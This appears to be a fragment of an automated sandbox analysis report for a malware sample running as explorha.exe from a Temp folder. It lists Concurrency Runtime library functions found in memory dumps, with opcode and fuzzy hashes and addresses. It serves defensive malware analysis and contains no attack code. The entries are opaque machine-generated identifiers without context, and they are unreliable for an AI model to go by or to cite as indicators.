                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                      • String ID:
                                                                                                      • API String ID: 1091748018-0
                                                                                                      • Opcode ID: 0feeb4aecd5b0acf58e6c1cda1afeed1ae6c7cb534fbf592347b50146509e8be
                                                                                                      • Instruction ID: ecbd141d0469d836a5cae41e1a5caf8ec26e97e8c51a021889388126bb8e0fee
                                                                                                      • Opcode Fuzzy Hash: 0feeb4aecd5b0acf58e6c1cda1afeed1ae6c7cb534fbf592347b50146509e8be
                                                                                                      • Instruction Fuzzy Hash: CA41F674600214ABCF19BB68C896BADBB65FF49710F1440A9E606DB387CF709D05CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 00886D82
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 00886DB6
                                                                                                      • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00886E1B
                                                                                                      • SafeRWList.LIBCONCRT ref: 00886E2A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                      • String ID:
                                                                                                      • API String ID: 893951542-0
                                                                                                      • Opcode ID: 6c1222fd1163190d63c2a138a7cfab992953a76497e3377dd3f4769521aaf15f
                                                                                                      • Instruction ID: b57c99eaaebf076bc7e16168fa60922f806d4f99f51709e3d153488c0d49eaee
                                                                                                      • Opcode Fuzzy Hash: 6c1222fd1163190d63c2a138a7cfab992953a76497e3377dd3f4769521aaf15f
                                                                                                      • Instruction Fuzzy Hash: A931F2367002149FDB09AB24CC81AADB7A6FFC9710F1846B9E909DF385DF31AD148B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 0088439F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                      • String ID:
                                                                                                      • API String ID: 3433162309-0
                                                                                                      • Opcode ID: 3cea40c1aae7277eaa9d90d0d43b2c48d462ff9814dc8a6957b556729f15f93e
                                                                                                      • Instruction ID: 0ce47192b093780f4263f82b59ee27ff16f29b81152cb79be1dc5bf7cada99bc
                                                                                                      • Opcode Fuzzy Hash: 3cea40c1aae7277eaa9d90d0d43b2c48d462ff9814dc8a6957b556729f15f93e
                                                                                                      • Instruction Fuzzy Hash: AA315A76A0130ADFCF10EF94C4C0BAEBBB9FB44304F1414AAD945AB346D730AA05DBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00892A89
                                                                                                      • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00892AD4
                                                                                                      • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 00892B07
                                                                                                      • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 00892BB7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                      • String ID:
                                                                                                      • API String ID: 2092016602-0
                                                                                                      • Opcode ID: 1b701811f8a6d109afa2d241cad521535b0a019f424d832ee6069cb1d21aa6c6
                                                                                                      • Instruction ID: c41479f658eedb6ea898b14f656986a4adc5657fa5513ce2d47fc156230c8be6
                                                                                                      • Opcode Fuzzy Hash: 1b701811f8a6d109afa2d241cad521535b0a019f424d832ee6069cb1d21aa6c6
                                                                                                      • Instruction Fuzzy Hash: 38315D71A00615AFCF18EF68C4919ADFBF6FF48310B18826DE415E7381DB34A941CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0088B32C
                                                                                                      • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 0088B378
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0088B38E
                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0088B3FA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 2033596534-0
                                                                                                      • Opcode ID: 760409254fd9b053e18a3c0aedda8c59325842c39b18659847eb2442941f2784
                                                                                                      • Instruction ID: 3937e72bdf01c63df3db9244b2f58beddff7f2fe338535012de12c8cbf272895
                                                                                                      • Opcode Fuzzy Hash: 760409254fd9b053e18a3c0aedda8c59325842c39b18659847eb2442941f2784
                                                                                                      • Instruction Fuzzy Hash: E921AF319006189FDB05FFA8D882DADBBF4FF45314B244069F055EB292DB70AE42CB56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0088B6F9
                                                                                                        • Part of subcall function 0088CBF0: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0088CC3F
                                                                                                      • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0088B70F
                                                                                                      • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0088B75B
                                                                                                        • Part of subcall function 0088C1D1: List.LIBCONCRT ref: 0088C207
                                                                                                      • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0088B76B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                      • String ID:
                                                                                                      • API String ID: 932774601-0
                                                                                                      • Opcode ID: f2a7e931c79aea77b4288e5d662afd6a7bc02e69ca304990fd166419e771191a
                                                                                                      • Instruction ID: 11db55e3c053b8ff3ad9c8adbd35be4cd9ffb9faace0abdda8b6eef17921a01f
                                                                                                      • Opcode Fuzzy Hash: f2a7e931c79aea77b4288e5d662afd6a7bc02e69ca304990fd166419e771191a
                                                                                                      • Instruction Fuzzy Hash: 89218C31900B149FCB24FF69DA918AAF3F9FF88300700495DE546A7661DB34F905CBA6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ListArray.LIBCONCRT ref: 008904FA
                                                                                                      • ListArray.LIBCONCRT ref: 0089050C
                                                                                                        • Part of subcall function 008905B9: _InternalDeleteHelper.LIBCONCRT ref: 008905CB
                                                                                                      • ListArray.LIBCONCRT ref: 00890516
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 0089052F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ArrayList$DeleteHelperInternal
                                                                                                      • String ID:
                                                                                                      • API String ID: 3844194624-0
                                                                                                      • Opcode ID: fbd71efcd49993942103e987dd111784402c7eba017c9987cea160ef3737de52
                                                                                                      • Instruction ID: 92e97856c8334955d9225396b40970a94924942540d6c03412942f65a55fa361
                                                                                                      • Opcode Fuzzy Hash: fbd71efcd49993942103e987dd111784402c7eba017c9987cea160ef3737de52
                                                                                                      • Instruction Fuzzy Hash: A601D672200621AFDF157B68DC8297DB75AFF9871070A4029F904E7616CB20EC219FD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ListArray.LIBCONCRT ref: 0088E755
                                                                                                      • ListArray.LIBCONCRT ref: 0088E767
                                                                                                        • Part of subcall function 0088DD42: _InternalDeleteHelper.LIBCONCRT ref: 0088DD54
                                                                                                      • ListArray.LIBCONCRT ref: 0088E771
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 0088E78A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ArrayList$DeleteHelperInternal
                                                                                                      • String ID:
                                                                                                      • API String ID: 3844194624-0
                                                                                                      • Opcode ID: 8d50871b56444dde2135b8b220b9f1000033a64c1f0159b6690891ba1d2ad9aa
                                                                                                      • Instruction ID: 967d3af73fcfa89619df60ea043272d034feb657b91cb05239306373fcb3b97c
                                                                                                      • Opcode Fuzzy Hash: 8d50871b56444dde2135b8b220b9f1000033a64c1f0159b6690891ba1d2ad9aa
                                                                                                      • Instruction Fuzzy Hash: CB01F432241631AFCB25BB68CDC2E6DBB1AFFD87107044129F904DB652DB20EC2187A6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00894A68
                                                                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00894A7C
                                                                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00894A94
                                                                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00894AAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                      • String ID:
                                                                                                      • API String ID: 78362717-0
                                                                                                      • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                      • Instruction ID: ce87156625e010af37c5eab1099154045742f3159d24e26fb8a84ac026d90b46
                                                                                                      • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                      • Instruction Fuzzy Hash: B501F232640224A7CF11FE588851EAF77EEFF94350F081015FC11E7282DA70ED0286A5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ListArray.LIBCONCRT ref: 00885F23
                                                                                                      • ListArray.LIBCONCRT ref: 00885F35
                                                                                                        • Part of subcall function 00886BE5: _InternalDeleteHelper.LIBCONCRT ref: 00886BF4
                                                                                                      • ListArray.LIBCONCRT ref: 00885F3F
                                                                                                      • _InternalDeleteHelper.LIBCONCRT ref: 00885F58
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ArrayList$DeleteHelperInternal
                                                                                                      • String ID:
                                                                                                      • API String ID: 3844194624-0
                                                                                                      • Opcode ID: 48ee500db0464e3b371635463311eb677775c5dad032c7987adcd6594dffdb69
                                                                                                      • Instruction ID: 81e3c262701a4e1c990905f4c9393e16e2783a36452825d595a0b0cfc2736517
                                                                                                      • Opcode Fuzzy Hash: 48ee500db0464e3b371635463311eb677775c5dad032c7987adcd6594dffdb69
                                                                                                      • Instruction Fuzzy Hash: 9401D672600A21AFCB26BB68DCC2E6D7B1AFF947207044069FA04DB516DF21EC21C792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0088ABA9
                                                                                                        • Part of subcall function 00880B5B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00886B16
                                                                                                      • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0088ABCD
                                                                                                      • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 0088ABE0
                                                                                                      • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 0088ABE9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                      • String ID:
                                                                                                      • API String ID: 218105897-0
                                                                                                      • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                      • Instruction ID: c8b5b486f73127e866e4a0c7356ec0b74a843eea4fda25f8446678af7b88d98f
                                                                                                      • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                      • Instruction Fuzzy Hash: FAF03031600A205EF629BA289811F6A6395FF44729F04845AE59ADB683CA24EC42CB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::critical_section::unlock.LIBCMT ref: 00880661
                                                                                                        • Part of subcall function 00880FF8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00881019
                                                                                                        • Part of subcall function 00880FF8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00881050
                                                                                                        • Part of subcall function 00880FF8: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0088105C
                                                                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0088066D
                                                                                                        • Part of subcall function 00880A9F: Concurrency::critical_section::unlock.LIBCMT ref: 00880AC3
                                                                                                      • Concurrency::Context::Block.LIBCONCRT ref: 00880672
                                                                                                        • Part of subcall function 008819F6: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 008819F8
                                                                                                      • Concurrency::critical_section::lock.LIBCONCRT ref: 00880692
                                                                                                        • Part of subcall function 00880F21: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00880F3C
                                                                                                        • Part of subcall function 00880F21: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00880F47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                      • String ID:
                                                                                                      • API String ID: 811866635-0
                                                                                                      • Opcode ID: a341d2473880c4bc1834d8fa49453d3c54d3e6db6ee03a0cdf121feb2205bc94
                                                                                                      • Instruction ID: f1889b6720bcfe50faf3507d241fef3c2741136a24c10554e117f3bd9586ff9b
                                                                                                      • Opcode Fuzzy Hash: a341d2473880c4bc1834d8fa49453d3c54d3e6db6ee03a0cdf121feb2205bc94
                                                                                                      • Instruction Fuzzy Hash: 02E04F34600215ABCB58FF68D4655ADFB61FF44310B548349E475872E1CF345E4ACF96
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe, xrefs: 0089F608
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                      • API String ID: 0-3666169776
                                                                                                      • Opcode ID: f879db64b927ee425cadfdc7f74c0513ece16d4a95e55c61b0a5172c5c8e627a
                                                                                                      • Instruction ID: bf98ac0561fc3660db6dc61fe0ab17bfa5222cbd4b491c7a38fbdeb298f83123
                                                                                                      • Opcode Fuzzy Hash: f879db64b927ee425cadfdc7f74c0513ece16d4a95e55c61b0a5172c5c8e627a
                                                                                                      • Instruction Fuzzy Hash: 7521D771600309AF9F25BF698C80D6B779DFF6136871C4535F668D7162EB31EC4086A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00892DF1
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00892E3C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                      • String ID: pContext
                                                                                                      • API String ID: 3390424672-2046700901
                                                                                                      • Opcode ID: 5121d03760832a9a6cc2c0e7a2f96b686e47c3a209cdf2df44e8d6ef483525f4
                                                                                                      • Instruction ID: a65955259545a89f68621c5ef9d472ba7874717f18703bbca9ae580feda57b1d
                                                                                                      • Opcode Fuzzy Hash: 5121d03760832a9a6cc2c0e7a2f96b686e47c3a209cdf2df44e8d6ef483525f4
                                                                                                      • Instruction Fuzzy Hash: 8511B136A00214ABCF19FF28C8D596D7769FF44360B194069E912EB342DB34ED058BD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0088CFDE
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0088CFF1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                      • String ID: pContext
                                                                                                      • API String ID: 548886458-2046700901
                                                                                                      • Opcode ID: f589d0627edc9ae8490e29efa7473d81fdc3b2e29217fb226cb67d299add3fc9
                                                                                                      • Instruction ID: c50a153443344718aab3f7796d2e45a023f8b0ebcd56126546556f6dcd31fd8e
                                                                                                      • Opcode Fuzzy Hash: f589d0627edc9ae8490e29efa7473d81fdc3b2e29217fb226cb67d299add3fc9
                                                                                                      • Instruction Fuzzy Hash: F2E09235B0020867CE08BBA8E85AC9DB77DFF847107084016F525E7395DB74EE0486A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00884B8C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.3041368250.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041394752.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041419159.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041449351.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.3041477502.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: std::invalid_argument::invalid_argument
                                                                                                      • String ID: pScheduler$version
                                                                                                      • API String ID: 2141394445-3154422776
                                                                                                      • Opcode ID: e4c76dbdcb773c2728bf00d87c7f15ce1c145a0a95ee075b2796ee4cb2ed1c97
                                                                                                      • Instruction ID: f2e0c5cdea50cb45d708b2986f5215713d67a4d783a9a44bf230e3683a6dcbf8
                                                                                                      • Opcode Fuzzy Hash: e4c76dbdcb773c2728bf00d87c7f15ce1c145a0a95ee075b2796ee4cb2ed1c97
                                                                                                      • Instruction Fuzzy Hash: 0DE08635540308B6CF25FAA8D84AFDC7778FF10369F148121B424E129597B8D688C782
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%